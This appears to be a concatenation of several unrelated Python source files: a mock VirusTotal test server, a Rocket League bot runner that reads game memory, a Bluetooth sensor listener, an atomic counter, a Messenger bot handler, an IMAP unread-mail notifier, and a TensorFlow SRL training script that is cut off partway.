return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, url)
def url_scan_cmd(self, parsed_url):
url = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_URL][0]
if url == SAMPLE_URL:
return MessageUtils.dict_to_json(SAMPLE_URL_SCAN, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_URL, url)
@staticmethod
def bad_param(param_name, param_val):
return MessageUtils.dict_to_json(
{
"unit_test_bad_param_name": param_name,
"unit_test_bad_param_val": param_val
},
pretty_print=False
)
@staticmethod
def unknown_call(path):
return MessageUtils.dict_to_json(
{
"unit_test_error_unknown_api": path
},
pretty_print=False
)
class MockServerRunner(object):
def __init__(self):
self.server_name = "mockvtserver"
self.mock_server_port = 0
self.mock_server = None
self.mock_server_address = ""
self.mock_server_thread = None
def __enter__(self):
self.mock_server_address, self.mock_server_port = get_free_port()
self.mock_server = TCPServer(
('localhost', self.mock_server_port),
MockVtServerRequestHandler
)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.mock_server.shutdown()
self.mock_server_thread.join()
self.mock_server.server_close()
|
runner.py
|
from ctypes import *
from ctypes.wintypes import *
from multiprocessing import Process, Array, Queue
import time
import realTimeDisplay
import ReadWriteMem
import PlayHelper
import array
import AlwaysTowardsBallAgent
OpenProcess = windll.kernel32.OpenProcess
CloseHandle = windll.kernel32.CloseHandle
ph = PlayHelper.play_helper()
def updateInputs(inputs, scoring, ph):
PROCESS_ALL_ACCESS = 0x1F0FFF
rwm = ReadWriteMem.ReadWriteMem()
pid = rwm.GetProcessIdByName("RocketLeague.exe")
rocketLeagueBaseAddress = rwm.GetBaseAddress(pid)
processHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
blueScore = None
orangeScore = None
blueDemo = None
orangeDemo = None
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while(True):
values = ph.GetValueVector(processHandle, addresses)
# Process scoring to see if any new goals or demos
if (blueScore == None):
# Need to update values if don't already exist
blueScore = values[1][0]
orangeScore = values[1][1]
blueDemo = values[1][2]
orangeDemo = values[1][3]
if (not blueScore == values[1][0]):
print("Blue has scored! Waiting for ball and players to reset")
blueScore = values[1][0]
time.sleep(15) # Sleep 15 seconds for goal and replay then ping for correct values
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while (ph.ping_refreshed_pointers(processHandle, addresses)):
time.sleep(0.5)
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not orangeScore == values[1][1]):
print("Orange has scored! Waiting for ball and players to reset")
orangeScore = values[1][1]
time.sleep(15) # Sleep 15 seconds for goal and replay then ping for correct values
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
while (ph.ping_refreshed_pointers(processHandle, addresses)):
time.sleep(0.5)
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not blueDemo == values[1][2]):
print("Orange has scored a demo on blue! Waiting for blue player to reset")
blueDemo = values[1][2]
time.sleep(4) # Takes about 3 seconds to respawn for a demo
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
if (not orangeDemo == values[1][3]):
print("Blue has scored a demo on orange! Waiting for orange player to reset")
orangeDemo = values[1][3]
time.sleep(4) # Takes about 3 seconds to respawn from demo. Even though blue can keep playing, for training I am just sleeping
addresses = ph.GetAddressVector(processHandle,rocketLeagueBaseAddress)
# Finally update input to values
for i in range(len(values[0])):
inputs[i] = values[0][i]
for i in range(len(values[1])):
scoring[i] = values[1][i]
time.sleep(0.01)
def runAgent(inputs, scoring, agent, q):
# Deep copy inputs?
while(True):
output1 = agent.get_output_vector((inputs,scoring))
try:
q.put(output1)
except Queue.Full:
pass
time.sleep(0.01)
if __name__ == '__main__':
time.sleep(3) # Sleep 3 second before starting to give me time to set things up
inputs = Array('f', [0.0 for x in range(38)])
scoring = Array('f', [0.0 for x in range(12)])
agent1 = AlwaysTowardsBallAgent.agent("blue")
agent2 = AlwaysTowardsBallAgent.agent("orange")
q1 = Queue(1)
q2 = Queue(1)
output1 = [16383, 16383, 32767, 0, 0, 0, 0]
output2 = [16383, 16383, 32767, 0, 0, 0, 0]
rtd = realTimeDisplay.real_time_display()
rtd.build_initial_window(agent1.get_bot_name(), agent2.get_bot_name())
ph = PlayHelper.play_helper()
p1 = Process(target=updateInputs, args=(inputs, scoring, ph))
p1.start()
p2 = Process(target=runAgent, args=(inputs, scoring, agent1, q1))
p2.start()
p3 = Process(target=runAgent, args=(inputs, scoring, agent2, q2))
p3.start()
while (True):
updateFlag = False
rtd.UpdateDisplay((inputs,scoring))
try:
output1 = q1.get()
updateFlag = True
except Queue.Empty:
pass
try:
output2 = q2.get()
updateFlag = True
except Queue.Empty:
pass
if (updateFlag):
ph.update_controllers(output1, output2)
rtd.UpdateKeyPresses(output1, output2)
time.sleep(0.01)
|
listener.py
|
from time import time
from threading import Thread
from flask import current_app
from gi.repository import GLib, Gio
from . import db, error
from .device import update_rssi, sensordata
from .timeutil import get_timedelta
def init(app):
with app.app_context():
try:
bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
names = bus.call_sync(
"org.freedesktop.DBus",
"/org/freedesktop/DBus",
"org.freedesktop.DBus",
"ListNames",
None,
None,
Gio.DBusCallFlags.NONE,
-1,
None,
)
if "org.bluez" not in names[0]:
error.log(500, "Bluetooth Error", "The BlueZ service is not running")
return None
user_data = {
"db_path": current_app.config["DB_PATH"],
"rate_limit": get_timedelta(
current_app.config.get("RATE_LIMIT")
).total_seconds(),
}
thread = Thread(target=listen, args=(user_data,))
thread.start()
except GLib.Error:
error.log(500, "DBus Error", "Could not connect to the system bus.")
def listen(user_data):
try:
bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
bus.call_sync(
"org.bluez",
"/org/bluez/hci0",
"org.bluez.Adapter1",
"StartDiscovery",
None,
None,
Gio.DBusCallFlags.NONE,
-1,
None,
)
conn = db.connect(user_data["db_path"])
for row in conn.execute("SELECT objPath FROM device"):
bus.signal_subscribe(
"org.bluez",
"org.freedesktop.DBus.Properties",
"PropertiesChanged",
row["objPath"],
None,
Gio.DBusSignalFlags.NONE,
callback,
user_data,
)
conn.close()
loop = GLib.MainLoop()
loop.run()
except GLib.Error:
error.log_no_context(
user_data["db_path"],
500,
"Bluetooth Error",
"Could not listen for Bluetooth events",
)
def callback(
connection,
sender_name,
object_path,
interface_name,
signal_name,
parameters,
user_data,
):
try:
for par in parameters:
if "RSSI" in par:
update_rssi(user_data["db_path"], object_path, par["RSSI"])
if "ManufacturerData" in par:
sensordata.insert(
user_data["db_path"],
object_path,
user_data["rate_limit"],
int(time()),
par["ManufacturerData"],
)
except Exception as e:
error.log_no_context(user_data["db_path"], 200, "Bluetooth Error", str(e))
|
AtomicCounter.py
|
"""An atomic, thread-safe incrementing counter."""
import threading
class AtomicCounter:
"""An atomic, thread-safe incrementing counter.
>>> counter = AtomicCounter()
>>> counter.increment()
1
>>> counter.increment(4)
5
>>> counter = AtomicCounter(42.5)
>>> counter.value
42.5
>>> counter.increment(0.5)
43.0
>>> counter = AtomicCounter()
>>> def incrementor():
... for i in range(100000):
... counter.increment()
>>> threads = []
>>> for i in range(4):
... thread = threading.Thread(target=incrementor)
... thread.start()
... threads.append(thread)
>>> for thread in threads:
... thread.join()
>>> counter.value
400000
"""
def __init__(self, initial=0):
"""Initialize a new atomic counter to given initial value (default 0)."""
self.value = initial
self._lock = threading.Lock()
def increment(self, num=1):
"""Atomically increment the counter by num (default 1) and return the
new value.
"""
with self._lock:
self.value += num
return self.value
def get_value(self):
with self._lock:
return self.value
if __name__ == '__main__':
import doctest
doctest.testmod()
|
handler.py
|
from threading import Thread
from sdk import *
from .queries.processor import process_text
import logging
from utils.text import restrict_len
from utils.mongo import Mongo
from utils.config import Config
import time
class Handler:
def __init__(self, config, facebook):
self.facebook = facebook
self.mongo = Mongo('users')
self.callback = None
self.languages = Config('languages.yml')
self.config = config
def set_lang(self, user_id, event):
lang = event['message']['text'].lower().strip()
if lang not in self.languages.keys():
try:
self.check(user_id)
except BaseException:
return
else:
logging.getLogger('app').log(logging.INFO, 'SET language {} to user {}'.format(lang, user_id))
self.mongo.user_made_first_contact(user_id, True)
self.mongo.set_lang(user_id, lang)
self.send(user_id, self.get_phrase(user_id, 'lang_install_success'))
time.sleep(1)
self.callback = None
self.mongo.insert_user_ready(user_id, True)
self.mongo.set_awaiting(user_id, False)
self.send(user_id, self.get_phrase(user_id, 'send_location'))
def check(self, user_id):
if self.mongo.is_user_first_contact(user_id):
self.send_waiting_response(user_id, 'What is your language? ({})'.format('/'.join(self.languages.keys())))
self.callback = self.set_lang
raise BaseException
def get_phrase(self, user_id, name):
return self.languages[self.mongo.get_user_lang(user_id)][name]
def process(self, event):
logging.getLogger('app').log(logging.INFO, 'Processing ' + str(event))
user_id = event['sender']['id']
if self.mongo.is_awaiting(user_id):
if 'message' in event and self.callback is not None:
self.callback(user_id, event)
return
try:
self.check(user_id)
except BaseException:
return
if not self.mongo.is_user_location_exists(user_id) and self.mongo.is_user_wants(
user_id) and not self.mongo.is_user_ready(user_id):
if not self.mongo.is_user_ready(user_id):
self.mongo.insert_user_ready(user_id, True)
self.send_waiting_response(user_id, self.get_phrase(user_id, 'send_location'))
return
if 'text' in event['message']:
data = event['message']['text']
data = process_text(data, self.config, {'user_id': user_id})
if type(data) is dict:
data['content'] = data['content'].split('\n\n')
elif 'attachments' in event['message']:
if len(event['message']['attachments']) > 1:
data = 'Only 1 attachment!'
else:
user_attachment = event['message']['attachments'][0]
if user_attachment['type'] == 'location':
if not self.mongo.is_user_location_exists(user_id) or self.mongo.is_user_ready(user_id):
self.mongo.insert_user_location(user_id, user_attachment['payload']['coordinates'])
logging.getLogger('app').log(logging.INFO,
'SET location {} to user {}'.format(
self.mongo.get_user_location(user_id), user_id)
)
data = self.get_phrase(user_id, 'location_updated')
else:
data = Attachment(
type='location',
payload=LocationPayload(user_attachment['payload']['coordinates'])
)
elif user_attachment['type'] == 'image':
data = Attachment(
type='image',
payload=ImagePayload(url=user_attachment['payload']['url'])
)
else:
data = process_text('sendsorryplease', self.config)
else:
data = process_text('sendsorryplease', self.config)
self.send(user_id, data)
def send_waiting_response(self, user_id, data):
self.send(user_id, data)
self.mongo.set_awaiting(user_id, True)
def send(self, user_id, data):
to = user_id
def start_thread(inp):
args = []
if inp['type'] == 'image':
args.append(Message(Recipient(to),
Attachment(type='image', payload=ImagePayload(url=inp['content']))))
elif inp['type'] == 'text':
text = restrict_len(inp['content'])
args.append(Message(Recipient(to), text))
if 'url' in inp and inp['url'] is not None:
url = restrict_len(inp['url'])
args.append(Message(Recipient(to), url))
Thread(target=self.facebook.message, args=(args,)).start()
if type(data) is str:
Thread(target=self.facebook.message,
args=(
Message(Recipient(to), restrict_len((data[:data.rfind('\n')] if '\n' in data else data))),)
).start()
elif type(data) is Attachment:
Thread(target=self.facebook.message,
args=(Message(Recipient(to), data),)).start()
elif type(data) is list:
for item_data in data:
if type(item_data) is str:
self.send(user_id, item_data)
elif type(item_data) is dict:
item_data['content'] = item_data['content'].split('\n\n')
self.send(user_id, item_data)
time.sleep(0.2)
elif type(data) is dict:
if type(data['content']) is list:
for content_data in data['content']:
dic = data
dic['content'] = content_data
start_thread(dic)
time.sleep(0.2)
|
imapclient.py
|
#!/usr/bin/env python3
# Standard libraries.
import asyncio
import collections.abc
import datetime
import enum
import imaplib
import logging
import pathlib
import select
import socket
import typing
# External dependencies.
import imapclient
import keyring
# Internal modules.
import phile.asyncio.pubsub
import phile.configuration
import phile.imapclient
import phile.notify
# TODO[mypy issue #1422]: __loader__ not defined
_loader_name: str = __loader__.name # type: ignore[name-defined]
_logger = logging.getLogger(_loader_name)
"""Logger whose name is the module name."""
class UnseenNotifier(phile.imapclient.FlagTracker):
"""Create a notification to indicate unread emails."""
def __init__(
self, *args: typing.Any, notify_path: pathlib.Path,
**kwargs: typing.Any
):
self._notify_path = notify_path
_logger.info("Using notification path: %s", self._notify_path)
super().__init__(*args, **kwargs)
# Ensure any existing notification file is cleared
# if there are no new messages.
self.update_notify_file()
def select(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().select(*args, **kwargs)
self.update_notify_file()
def add(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().add(*args, **kwargs)
self.update_notify_file()
def update_notify_file(self) -> None:
message_counts = self.message_counts
unknown_count = message_counts['unknown']
unseen_count = message_counts['unseen']
_logger.debug("Message status: %s", message_counts)
if unknown_count or unseen_count:
_logger.debug("Creating notification file.")
self._notify_path.write_text(
"There are {} + {} unseen messages.".format(
unseen_count, unknown_count
)
)
else:
try:
_logger.debug("Removing notification file.")
self._notify_path.unlink()
except FileNotFoundError:
_logger.debug("Notification file not found. Ignoring.")
class MissingCredential(Exception):
pass
async def load_configuration(
configuration: phile.configuration.Entries,
keyring_backend: keyring.backend.KeyringBackend,
) -> phile.configuration.ImapEntries:
imap_configuration = configuration.imap
if imap_configuration is None:
raise MissingCredential(
'Unable to find imap credentials in configuration'
)
imap_configuration = imap_configuration.copy()
del configuration
if imap_configuration.password is not None:
if imap_configuration.username is None:
raise MissingCredential('Unable to find imap username.')
else:
credential = await asyncio.to_thread(
keyring_backend.get_credential,
'imap',
imap_configuration.username,
)
if credential is None:
raise MissingCredential('Unable to load imap password.')
imap_configuration.password = credential.password
imap_configuration.username = credential.username
return imap_configuration
def create_client(
imap_configuration: phile.configuration.ImapEntries,
) -> tuple[imapclient.IMAPClient, phile.imapclient.SelectResponse]:
assert imap_configuration.username is not None
assert imap_configuration.password is not None
_logger.info('Connecting to %s', imap_configuration.host)
imap_client = imapclient.IMAPClient(
host=imap_configuration.host,
timeout=imap_configuration.connect_timeout.total_seconds(),
)
_logger.info('Logging in to %s', imap_configuration.username)
response = imap_client.login(
imap_configuration.username,
imap_configuration.password,
)
_logger.debug('Login response: %s', response.decode())
_logger.info('Selecting folder: %s', imap_configuration.folder)
select_response = imap_client.select_folder(
imap_configuration.folder
)
return imap_client, select_response
def idle(
imap_client: imapclient.IMAPClient,
stop_socket: socket.socket,
refresh_timeout: datetime.timedelta,
) -> collections.abc.Iterator[list[phile.imapclient.ResponseLine]]:
_logger.debug("Starting IDLE wait loop.")
imap_socket = phile.imapclient.get_socket(imap_client)
while True:
refresh_time = datetime.datetime.now() + refresh_timeout
assert not phile.imapclient.is_idle(imap_client)
_logger.debug("Entering IDLE state.")
imap_client.idle()
try:
rlist = [imap_socket]
while rlist:
timeout = refresh_time - datetime.datetime.now()
rlist, wlist, xlist = select.select(
[imap_socket, stop_socket],
[],
[],
max(timeout.total_seconds(), 0),
)
del timeout
del wlist
del xlist
if imap_socket in rlist:
idle_response = imap_client.idle_check(timeout=0)
_logger.debug("IDLE response: %s", idle_response)
# If no data is returned, the conenction is closed.
# Try to stop. idle_done will likely error.
if not idle_response:
return
yield idle_response
del idle_response
if stop_socket in rlist:
return
finally:
_logger.debug("Exiting IDLE state.")
done_response = imap_client.idle_done()
_logger.debug("IDLE done response: %s", done_response)
yield done_response[1]
del done_response
class EventType(enum.IntEnum):
ADD = enum.auto()
SELECT = enum.auto()
class Event(typing.TypedDict, total=False):
type: EventType
add_response: list[phile.imapclient.ResponseLine]
select_response: phile.imapclient.SelectResponse
def read_from_server(
*,
imap_configuration: phile.configuration.ImapEntries,
stop_socket: socket.socket,
) -> collections.abc.Iterator[Event]:
idle_refresh_timeout = imap_configuration.idle_refresh_timeout
maximum_reconnect_delay = imap_configuration.maximum_reconnect_delay
minimum_reconnect_delay = imap_configuration.minimum_reconnect_delay
# First connect does not need a delay.
reconnect_delay = datetime.timedelta(seconds=0)
while True:
# Reset the database before waiting.
yield Event(
type=EventType.SELECT,
select_response={
b"EXISTS": 0,
b"FLAGS": tuple(),
b"RECENT": 0,
},
)
_logger.info("Connecting in %s.", reconnect_delay)
rlist, wlist, xlist = select.select([
stop_socket
], [], [], reconnect_delay.total_seconds())
if rlist:
_logger.info("Received stop request. Not connecting.")
break
del rlist
del wlist
del xlist
_logger.debug("Creating an IMAP client to connect with.")
imap_client, select_response = create_client(
imap_configuration=imap_configuration,
)
try:
yield Event(
type=EventType.SELECT,
select_response=select_response,
)
del select_response
# Now that the connection has been successful,
# reset the reconnection delay.
reconnect_delay = datetime.timedelta(seconds=0)
for response_lines in idle(
imap_client=imap_client,
refresh_timeout=idle_refresh_timeout,
stop_socket=stop_socket,
):
yield Event(
type=EventType.ADD,
add_response=response_lines,
)
# Connection and socket errors are subclasses of `OSError`.
# There are no finer grain parent class
# that catches all socket errors.
# Listing all socket errors individually is not a good idea,
# so a blanket catch of `OSError` is done here instead.
except (
imaplib.IMAP4.abort, imaplib.IMAP4.error, OSError
) as error:
_logger.info(error)
# Double the delay.
reconnect_delay *= 2
reconnect_delay = max(
reconnect_delay, minimum_reconnect_delay
)
reconnect_delay = min(
reconnect_delay, maximum_reconnect_delay
)
finally:
# Always logout before returning to try to clean up
# on a best effort basis.
_logger.debug("Logging out from IMAP client.")
try:
imap_client.logout()
# Some servers immediately close the socket
# when it receives a `BYE` request.
# This means attempting to close the socket
# would raise an exception.
# Since a disconnection is the goal here anyway,
# catch the exception and continue.
except (imaplib.IMAP4.error, OSError):
_logger.info("IMAP socket was not closed properly.")
async def run(
configuration: phile.configuration.Entries,
keyring_backend: keyring.backend.KeyringBackend,
) -> None:
event_queue = phile.asyncio.pubsub.Queue[Event]()
imap_configuration = await load_configuration(
configuration=configuration,
keyring_backend=keyring_backend,
)
loop = asyncio.get_running_loop()
stop_reader, stop_writer = await loop.run_in_executor(
None, socket.socketpair
)
try:
def handle_event() -> None:
try:
for event in read_from_server(
imap_configuration=imap_configuration,
stop_socket=stop_reader,
):
loop.call_soon_threadsafe(event_queue.put, event)
finally:
loop.call_soon_threadsafe(event_queue.put_done)
worker_thread = phile.asyncio.Thread(target=handle_event)
notify_directory = (
configuration.state_directory_path /
configuration.notify_directory
)
notify_directory.mkdir(parents=True, exist_ok=True)
imap_response_handler = UnseenNotifier(
notify_path=(notify_directory / "20-imap-idle.notify")
)
del notify_directory
event_reader = event_queue.__aiter__()
worker_thread.start()
try:
# A branching path going from `async for` to `finally`
# is reported as missing by `coverage.py`.
# But it should be covered by one of the tests already.
# Specifically, propagation of connection error.
# So ignoring this branch report for now,
async for event in event_reader: # pragma: no branch
event_type = event['type']
if event_type == EventType.ADD:
await loop.run_in_executor(
None,
imap_response_handler.add,
event['add_response'],
)
elif event_type == EventType.SELECT:
await loop.run_in_executor(
None,
imap_response_handler.select,
event['select_response'],
)
else: # pragma: no cover # Defensive.
assert False, 'Unreadable.'
finally:
_logger.info("Sending stop request. To not connect.")
stop_writer.sendall(b'\0')
await worker_thread.async_join()
finally:
try:
stop_reader.close()
finally:
stop_writer.close()
|
main.py
|
# main.py
# author: Playinf
# email: playinf@stu.xmu.edu.cn
import os
import ops
import sys, pdb
import copy
import argparse
import numpy as np
import tensorflow as tf
import multiprocessing
from utils import parallel_model
from utils.validation import validate
from data.record_reader import get_input_fn
from data.plain_text import load_vocab, load_glove_embedding
from data.plain_text import get_sorted_input_fn, convert_text
from ops.initializer import variance_scaling_initializer
from models.tagger import get_tagger_model, get_model_params
from metrics import create_tagger_evaluation_metrics
def parseargs_train(args):
msg = "training SRL models"
usage = "main.py train [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pre-trained embedding file"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "training parameters"
parser.add_argument("--training_params", default="", type=str, help=msg)
msg = "validation params"
parser.add_argument("--validation_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
return parser.parse_args(args)
def parseargs_predict(args):
msg = "predict using existing SRL models"
usage = "main.py predict [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
msg = "use viterbi decoding"
parser.add_argument("--viterbi", action="store_true", help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def parseargs_ensemble(args):
msg = "ensemble using existing SRL models"
usage = "main.py ensemble [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--checkpoints", nargs="+", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs="+", help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
msg = "use viterbi decoding"
parser.add_argument("--viterbi", action="store_true", help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def parseargs_visualize(args):
msg = "Visualize attention weights using existing SRL models"
usage = "main.py visualize [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output html file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def get_vocabulary(vocab_path):
tok_voc = load_vocab(vocab_path[0])
lab_voc = load_vocab(vocab_path[1])
vocabulary = {"inputs": tok_voc, "targets": lab_voc}
return vocabulary
def get_ensemble_vocabulary(vocab_path):
vocs = [load_vocab(item) for item in vocab_path]
voc_list = []
tok_voc = vocs[:-1]
lab_voc = vocs[-1]
for item in tok_voc:
vocab = {"inputs": item, "targets": lab_voc}
voc_list.append(vocab)
return voc_list
def training_params():
params = tf.contrib.training.HParams(
optimizer="Adam",
learning_rate=1.0,
max_learning_rate=5e-4,
adam_beta1=0.9,
adam_beta2=0.98,
adam_epsilon=1e-9,
adadelta_rho=0.95,
adadelta_epsilon=1e-6,
initializer_gain=1.0,
clip_grad_norm=0.0,
batch_size=4096,
eval_batch_size=4096,
max_length=256,
mantissa_bits=2,
warmup_steps=4000,
train_steps=250000,
eval_steps=10,
min_eval_frequency=2000,
keep_checkpoint_max=20,
batching_scheme="token",
learning_rate_decay="noam",
learning_rate_boundaries=[0],
learning_rate_values=[0.0],
initializer="uniform_unit_scaling",
device_list=[0],
allow_growth=True,
use_global_initializer=True
)
return params
def validation_params():
params = tf.contrib.training.HParams(
script="",
frequency=300,
keep_top_k=5
)
return params
def decoding_params():
params = tf.contrib.training.HParams(
decode_batch_size=128,
)
return params
def merge_params(p1, p2):
# pdb.set_trace()
params = tf.contrib.training.HParams()
v1 = p1.values()
v2 = p2.values()
for (k, v) in v1.items():
params.add_hparam(k, v)
for (k, v) in v2.items():
params.add_hparam(k, v)
return params
def get_params(args):
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_dir=args.model_dir,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
training_params=args.training_params
)
tparams = training_params()
tparams.parse(args.training_params)
params = merge_params(params, tparams)
mparams = get_model_params(args.model_name)
mparams.parse(args.model_params)
params = merge_params(params, mparams)
vparams = validation_params()
vparams.parse(args.validation_params)
params = merge_params(params, vparams)
dparams = decoding_params()
dparams.parse(args.decoding_params)
params = merge_params(params, dparams)
return params
def print_params(params):
for (k, v) in params.values():
print("%s: %s" % (k, v))
def orthogonal_initializer(gain=1.0, seed=None, dtype=tf.float32):
oinit = tf.orthogonal_initializer(gain, seed, dtype)
def initializer(shape, dtype=dtype, partition_info=None):
if len(shape) == 1:
result = oinit(list(shape) + [1], dtype, partition_info)
return tf.squeeze(result, 1)
return oinit(shape, dtype, partition_info)
return initializer
def get_transition_params(label_strs):
num_tags = len(label_strs)
transition_params = np.zeros([num_tags, num_tags], dtype=np.float32)
for i, prev_label in enumerate(label_strs):
for j, label in enumerate(label_strs):
if prev_label[0] == "B" and label[0] == "I":
if prev_label[1:] != label[1:]:
transition_params[i, j] = np.NINF
if prev_label[0] == "I" and label[0] == "I":
if prev_label[1:] != label[1:]:
transition_params[i, j] = np.NINF
return transition_params
def get_initializer(params):
if params.initializer == "orthogonal":
return orthogonal_initializer(gain=params.initializer_gain)
elif params.initializer == "uniform":
max_val = params.initializer_gain
return tf.random_uniform_initializer(-max_val, max_val)
elif params.initializer == "normal":
return tf.random_normal_initializer(0.0, params.initializer_gain)
elif params.initializer == "normal_unit_scaling":
return variance_scaling_initializer(params.initializer_gain,
mode="fan_avg",
distribution="normal")
elif params.initializer == "uniform_unit_scaling":
return variance_scaling_initializer(params.initializer_gain,
mode="fan_avg",
distribution="uniform")
else:
raise ValueError("Unrecognized initializer: %s" % params.initializer)
def get_learning_rate_decay(learning_rate, global_step, params):
if params.learning_rate_decay == "noam":
return ops.train.noam_decay(learning_rate, global_step,
params.warmup_steps,
params.hidden_size ** -0.5)
elif params.learning_rate_decay == "piecewise_constant":
return tf.train.piecewise_constant(tf.to_int32(global_step),
params.learning_rate_boundaries,
params.learning_rate_values)
elif params.learning_rate_decay == "none":
return learning_rate
else:
raise ValueError("Unknown learning_rate_decay")
def set_variables(var_list, value_dict, prefix):
sess = tf.get_default_session()
for var in var_list:
for name in value_dict:
var_name = "/".join([prefix] + list(name.split("/")[1:]))
if var.name[:-2] == var_name:
print("restoring %s -> %s" % (name, var.name))
with tf.device("/cpu:0"):
op = tf.assign(var, value_dict[name])
sess.run(op)
break
def srl_model(features, labels, mode, params):
if mode == tf.contrib.learn.ModeKeys.TRAIN:
initializer = get_initializer(params)
tf.get_variable_scope().set_initializer(initializer)
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
loss = parallel_model(model_fn, features, params, mode)
with tf.variable_scope("losses_avg"):
loss_moving_avg = tf.get_variable("training_loss",
initializer=100.0,
trainable=False)
lm = loss_moving_avg.assign(loss_moving_avg * 0.9 + loss * 0.1)
tf.summary.scalar("loss_avg/total_loss", lm)
with tf.control_dependencies([lm]):
loss = tf.identity(loss)
global_step = tf.train.get_or_create_global_step()
lr = get_learning_rate_decay(params.learning_rate, global_step, params)
# create optimizer
if params.optimizer == "Adam":
opt = tf.train.AdamOptimizer(lr, beta1=params.adam_beta1,
beta2=params.adam_beta2,
epsilon=params.adam_epsilon)
elif params.optimizer == "Adadelta":
opt = tf.train.AdadeltaOptimizer(lr, rho=params.adadelta_rho,
epsilon=params.adadelta_epsilon)
elif params.optimizer == "SGD":
opt = tf.train.GradientDescentOptimizer(lr)
elif params.optimizer == "Nadam":
opt = tf.contrib.opt.NadamOptimizer(lr, beta1=params.adam_beta1,
beta2=params.adam_beta2,
epsilon=params.adam_epsilon)
else:
raise ValueError("Unknown optimizer %s" % params.optimizer)
global_step = tf.train.get_global_step()
tf.summary.scalar("learning_rate", lr)
log_hook = tf.train.LoggingTensorHook(
{
"step": global_step,
"loss": loss,
"inputs": tf.shape(features["inputs"]),
"labels": tf.shape(labels)
},
every_n_iter=1,
)
all_weights = {v.name: v for v in tf.trainable_variables()}
total_size = 0
for v_name in sorted(list(all_weights)):
v = all_weights[v_name]
tf.logging.info("%s\tshape %s", v.name[:-2].ljust(80),
str(v.shape).ljust(20))
v_size = int(np.prod(np.array(v.shape.as_list())))
total_size += v_size
tf.logging.info("Total trainable variables size: %d", total_size)
train_op = tf.contrib.layers.optimize_loss(
name="training",
loss=loss,
global_step=global_step,
learning_rate=lr,
clip_gradients=params.clip_grad_norm or None,
optimizer=opt,
colocate_gradients_with_ops=True
)
training_chief_hooks = [log_hook]
predictions = None
elif mode == tf.contrib.learn.ModeKeys.EVAL:
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
loss, logits = model_fn(features, params)
